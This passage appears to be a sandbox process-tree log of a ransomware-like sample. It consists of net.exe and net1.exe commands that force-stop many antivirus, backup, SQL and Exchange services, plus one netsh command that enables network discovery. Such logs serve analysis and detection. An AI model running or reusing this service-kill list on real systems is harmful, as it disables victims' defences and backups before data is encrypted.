C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:4228

C:\Windows\SYSTEM32\net.exe
"net.exe" stop EsgShKernel /y
2⤵
PID:4196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
3⤵
PID:4348

C:\Windows\SYSTEM32\net.exe
"net.exe" stop KAVFS /y
2⤵
PID:4320

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
3⤵
PID:4448

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamBrokerSvc /y
2⤵
PID:4356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
3⤵
PID:4476

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLWriter /y
2⤵
PID:4404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
3⤵
PID:4508

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
2⤵
PID:4516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:4512

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
2⤵
PID:4492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:4628

C:\Windows\SYSTEM32\net.exe
"net.exe" stop klnagent /y
2⤵
PID:4640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop klnagent /y
3⤵
PID:4632

C:\Windows\SYSTEM32\net.exe
"net.exe" stop KAVFSGT /y
2⤵
PID:4604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
3⤵
PID:4740

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamCatalogSvc /y
2⤵
PID:4776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
3⤵
PID:4816

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamBackupSvc /y
2⤵
PID:4720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
3⤵
PID:4768

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
2⤵
PID:4852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:4904

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
2⤵
PID:3168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:4928

C:\Windows\SYSTEM32\net.exe
"net.exe" stop macmnsvc /y
2⤵
PID:4888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
3⤵
PID:5088

C:\Windows\SYSTEM32\net.exe
"net.exe" stop kavfsslp /y
2⤵
PID:4936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
3⤵
PID:5004

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamCloudSvc /y
2⤵
PID:3896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
3⤵
PID:1968

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLServerADHelper /y
2⤵
PID:3860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
3⤵
PID:1160

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
2⤵
PID:5072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
3⤵
PID:4192

C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeEngineService /y
2⤵
PID:616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
3⤵
PID:3800

C:\Windows\SYSTEM32\net.exe
"net.exe" stop masvc /y
2⤵
PID:4200

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
3⤵
PID:4380

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
2⤵
PID:4252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
3⤵
PID:4324

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:4328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:4384

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
2⤵
PID:4260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
3⤵
PID:4508

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
2⤵
PID:4388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:4484

C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeFramework /y
2⤵
PID:4436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
3⤵
PID:4628

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MBAMService /y
2⤵
PID:4524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
3⤵
PID:4668

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamMountSvc /y
2⤵
PID:4616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
3⤵
PID:4816

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploySvc /y
2⤵
PID:4740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
3⤵
PID:4808

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLSERVER /y
2⤵
PID:4744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
3⤵
PID:4960

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLServerOLAPService /y
2⤵
PID:4892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
3⤵
PID:4928

C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
2⤵
PID:4908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:5016

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MBEndpointAgent /y
2⤵
PID:4992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
3⤵
PID:5004

C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
2⤵
PID:5116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
3⤵
PID:4976

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
2⤵
PID:1508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
3⤵
PID:1512

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:1968

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:1972

C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
PID:4156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:4332

C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfefire /y
2⤵
PID:1088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
3⤵
PID:4416

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MySQL57 /y
2⤵
PID:1168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
3⤵
PID:4420

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3896

C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
2⤵
PID:4424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
3⤵
PID:4444

C:\Windows\SYSTEM32\net.exe
"net.exe" stop wbengine /y
2⤵
PID:4448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:4196

C:\Windows\SYSTEM32\net.exe
"net.exe" stop McShield /y
2⤵
PID:4280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
3⤵
PID:4796

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
2⤵
PID:5040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
3⤵
PID:4328

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
2⤵
PID:4352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
3⤵
PID:1248

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:3092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
3⤵
PID:4852

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamRESTSvc /y
2⤵
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
3⤵
PID:4864

C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
2⤵
PID:4224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3⤵
PID:4412

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
2⤵
PID:4564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
3⤵
PID:4748

C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
2⤵
PID:4584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
3⤵
PID:4752

C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfemms /y
2⤵
PID:4496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
3⤵
PID:4676

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MySQL80 /y
2⤵
PID:4456

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
3⤵
PID:4684

C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
2⤵
PID:4900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
3⤵
PID:3900

C:\Windows\SYSTEM32\net.exe
"net.exe" stop McTaskManager /y
2⤵
PID:4884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
3⤵
PID:2856

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
2⤵
PID:4772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
3⤵
PID:4792

C:\Windows\SYSTEM32\net.exe
"net.exe" stop wbengine /y
2⤵
PID:4984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:5032

C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
2⤵
PID:5080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
3⤵
PID:5100

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:4916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:184

C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
2⤵
PID:5084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
3⤵
PID:5028

C:\Windows\SYSTEM32\net.exe
"net.exe" stop RESvc /y
2⤵
PID:5112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
3⤵
PID:4240

C:\Windows\SYSTEM32\net.exe
"net.exe" stop OracleClientCache80 /y
2⤵
PID:4232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
3⤵
PID:4184

C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
2⤵
PID:4324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
3⤵
PID:2948

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
2⤵
PID:4180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
3⤵
PID:4384

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
2⤵
PID:2724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:4540

C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfevtp /y
2⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
3⤵
PID:4696

C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
2⤵
PID:4480

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
3⤵
PID:3964

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:4644

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:2112

C:\Windows\SYSTEM32\net.exe
"net.exe" stop sms_site_sql_backup /y
2⤵
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
3⤵
PID:4160

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SepMasterService /y
2⤵
PID:4864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
3⤵
PID:4512

C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
2⤵
PID:2984

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
3⤵
PID:4932

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:4604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:4608

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
2⤵
PID:4816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:4528

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
2⤵
PID:4784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
3⤵
PID:4848

C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
2⤵
PID:4648

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
3⤵
PID:4956

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$SOPHOS /y
2⤵
PID:4676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
3⤵
PID:4960

C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:2864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
4⤵
PID:4264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:5088

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ShMonitor /y
2⤵
PID:2024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
3⤵
PID:4952

C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
2⤵
PID:4820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
3⤵
PID:4996

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
2⤵
PID:5076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:5048

C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
2⤵
PID:5052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
3⤵
PID:5100

C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
2⤵
PID:2080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
3⤵
PID:4136

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$PROD /y
2⤵
PID:5068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
3⤵
PID:4332

C:\Windows\SYSTEM32\net.exe
"net.exe" stop sacsvr /y
2⤵
PID:2152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
3⤵
PID:4148

C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:1096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:4544

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3⤵
PID:4696

C:\Windows\SYSTEM32\net.exe
"net.exe" stop Smcinst /y
2⤵
PID:4936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
3⤵
PID:4260

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:4244

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$CXDB /y
2⤵
PID:4476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
3⤵
PID:4664

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
2⤵
PID:4328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
3⤵
PID:4320

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
2⤵
PID:4620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:4840

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SAVAdminService /y
2⤵
PID:4656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
3⤵
PID:4752

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:4720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:4652

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:4808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
3⤵
PID:4836

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SmcService /y
2⤵
PID:1524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
3⤵
PID:4708

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
2⤵
PID:4724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
3⤵
PID:3712

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Enterprise Client Service” /y
2⤵
PID:1092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
3⤵
PID:4044

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “SQL Backups /y
2⤵
PID:4856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
3⤵
PID:908

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
2⤵
PID:184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
3⤵
PID:1972

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:4812

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SAVService /y
2⤵
PID:4876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
3⤵
PID:1512

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MsDtsServer100 /y
2⤵
PID:1160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
3⤵
PID:5108

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:5104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:4544

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SntpService /y
2⤵
PID:4488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
3⤵
PID:4188

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
2⤵
PID:5044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:2388

C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetMsmqActivator /y
2⤵
PID:4364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
3⤵
PID:4248

C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:2112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
3⤵
PID:4548

C:\Windows\SYSTEM32\net.exe
"net.exe" stop swi_filter /y
2⤵
PID:4160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
3⤵
PID:4356

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
2⤵
PID:4484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
3⤵
PID:4500

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSExchangeIS /y
2⤵
PID:4776

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
3⤵
PID:4612

C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:4600

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:4524

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:908

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$TPS /y
2⤵
PID:4492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
3⤵
PID:4388

C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophossps /y
2⤵
PID:4592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
3⤵
PID:4836

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
2⤵
PID:4628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
3⤵
PID:1224

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
2⤵
PID:4692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
3⤵
PID:4216

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SamSs /y
2⤵
PID:2856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
3⤵
PID:1052

C:\Windows\SYSTEM32\net.exe
"net.exe" stop swi_service /y
2⤵
PID:4880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
3⤵
PID:908

C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
2⤵
PID:4768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
3⤵
PID:1264

C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
2⤵
PID:5016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
3⤵
PID:4376

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
2⤵
PID:3172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
3⤵
PID:3168

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ReportServer /y
2⤵
PID:4192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
3⤵
PID:3800

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
2⤵
PID:4380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
3⤵
PID:4260

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
2⤵
PID:2948

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
3⤵
PID:4852

C:\Windows\SYSTEM32\net.exe
"net.exe" stop swi_update /y
2⤵
PID:2464

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
3⤵
PID:500

C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
2⤵
PID:4400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
3⤵
PID:4244

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
2⤵
PID:4124

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
3⤵
PID:4632

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:4752

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4848

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MsDtsServer110 /y
2⤵
PID:4340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
3⤵
PID:4460

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:4624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:3712

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Acronis VSS Provider” /y
2⤵
PID:4388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
3⤵
PID:5024

C:\Windows\SYSTEM32\net.exe
"net.exe" stop POP3Svc /y
2⤵
PID:4904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
3⤵
PID:4652

C:\Windows\SYSTEM32\net.exe
"net.exe" stop svcGenericHost /y
2⤵
PID:4504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
3⤵
PID:5020

C:\Windows\SYSTEM32\net.exe
"net.exe" stop swi_update_64 /y
2⤵
PID:4136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
3⤵
PID:4876

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MsDtsServer /y
2⤵
PID:1512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
3⤵
PID:4328

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSExchangeMGMT /y
2⤵
PID:4264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
3⤵
PID:4744

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLTELEMETRY /y
2⤵
PID:4448

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
3⤵
PID:2984

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos Clean Service” /y
2⤵
PID:4628

C:\Windows\system32\net1.exe
